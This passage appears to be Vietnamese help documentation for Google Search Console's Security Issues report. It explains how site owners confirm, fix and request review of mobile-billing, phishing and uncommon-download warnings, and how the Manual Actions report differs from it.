Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Nếu Google phát hiện thấy trang web của bạn không thông báo đầy đủ cho người dùng về các khoản phí di động bổ sung, thì Chrome có thể hiển thị cảnh báo trước khi người dùng tải một trang làm phát sinh phí.
1. Xác nhận vấn đề
Truy cập các URL ví dụ được liệt kê trong báo cáo để xem trang nào có quy trình thanh toán qua dịch vụ di động không rõ ràng. Xem lại hướng dẫn về hình thức thanh toán qua dịch vụ di động tại đây.
2. Khắc phục vấn đề
Khắc phục các trang của bạn để chúng tuân thủ các phương pháp hay nhất về thanh toán qua dịch vụ di động.
3. Yêu cầu xem xét
Khi bạn xác nhận chắc chắn rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Một số trang trên trang web của bạn đang bị nghi ngờ có hành vi lừa đảo và một cảnh báo dạng cửa sổ bật lên về việc dùng lại mật khẩu đã được kích hoạt khi người dùng cố gắng đăng nhập. Công cụ Duyệt web An toàn của Google bảo vệ người dùng trên web bằng cách cảnh báo họ khi họ dùng lại mật khẩu đã lưu trong những trường hợp như vậy.
Đôi khi, tin tặc có thể lừa người dùng sử dụng lại mật khẩu của họ trên những trang trông giống trang đăng nhập chính thức nhằm đánh cắp thông tin của người dùng. Loại nội dung lừa đảo này được gọi là hành vi tấn công phi kỹ thuật. Tìm hiểu thêm về hành vi tấn công phi kỹ thuật hoặc xem ví dụ về các trang lừa đảo.
1. Xác nhận vấn đề
Truy cập các trang ví dụ để tìm nội dung lừa đảo. Bạn có thể dùng Công cụ kiểm tra URL để xem trang web của mình ở cả chế độ xem cho thiết bị di động và máy tính.
2. Khắc phục vấn đề
Khắc phục vấn đề trên mọi trang có hành vi tấn công phi kỹ thuật. Nếu bạn cho rằng trang web của mình đã bị tấn công, hãy tham khảo Hướng dẫn trợ giúp của chúng tôi cho các trang web bị tấn công. Nếu bạn cho rằng công cụ Duyệt web an toàn đã phân loại nhầm một trang, vui lòng báo cáo tại đây.3. Yêu cầu xem xét
Khi bạn xác nhận chắc chắn rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Trang web của bạn đang cung cấp tệp tải xuống mà công cụ Duyệt web An toàn của Google chưa từng thấy trước đây. Trình duyệt Chrome có thể cảnh báo rằng đây là tệp tải xuống bất thường và có thể nguy hiểm. Cảnh báo sẽ được tự động gỡ bỏ nếu Duyệt web An toàn của Google xác minh rằng tệp an toàn. Xin lưu ý rằng báo cáo không phải lúc nào cũng cung cấp URL ví dụ cho vấn đề này.
Vấn đề này sẽ không ngăn trang hoặc trang web của bạn xuất hiện trong kết quả của Google Tìm kiếm, nhưng trình duyệt Chrome sẽ hiển thị cảnh báo khi người dùng yêu cầu tải xuống các tệp không xác định.
1. Khắc phục vấn đề
Tìm và xác nhận xem các tệp tải xuống của bạn có tuân thủ nguyên tắc về tệp tải xuống hay không.
- Nếu bất kỳ tệp tải xuống nào trên trang web của bạn vi phạm các nguyên tắc này, hãy xóa chúng.
- Nếu tệp tải xuống không vi phạm các nguyên tắc này, bạn không cần phải xóa.
2. Yêu cầu xem xét
Khi bạn đã xóa tệp (hoặc xác minh rằng các tệp tải xuống của bạn tuân thủ nguyên tắc tải xuống), hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần. Ngay cả khi bạn không gửi yêu cầu xem xét lại, dần dẫn Google vẫn sẽ đánh giá hầu hết các tệp tải xuống và phân loại chúng là hợp lệ hay có hại. Tuy nhiên, việc gửi yêu cầu xem xét lại có thể giúp đẩy nhanh quá trình đánh giá.
Báo cáo Thao tác thủ công có gì khác với báo cáo Vấn đề bảo mật?
Báo cáo Thao tác thủ công liệt kê các vấn đề trên một trang hay trang web mà chủ yếu cố gắng can thiệp vào chỉ mục tìm kiếm của chúng tôi, nhưng không hẳn nguy hiểm với người dùng. Hầu hết các vấn đề được báo cáo ở đây sẽ dẫn đến việc trang hoặc trang web bị giảm hạng hoặc xóa khỏi kết quả tìm kiếm mà không có bất kỳ dấu hiệu trực quan nào cho người dùng.
Báo cáo Vấn đề bảo mật liệt kê các dấu hiệu cho thấy trang web của bạn đã bị tấn công hoặc hành vi trên trang web của bạn có thể gây hại cho khách truy cập hoặc máy tính của họ. Ví dụ: tấn công lừa đảo hoặc cài đặt phần mềm độc hại hoặc phần mềm không mong muốn vào máy tính của người dùng. Những trang này có thể xuất hiện kèm theo nhãn cảnh báo trong kết quả tìm kiếm, hoặc trình duyệt có thể hiển thị trang cảnh báo trung gian khi người dùng cố gắng truy cập.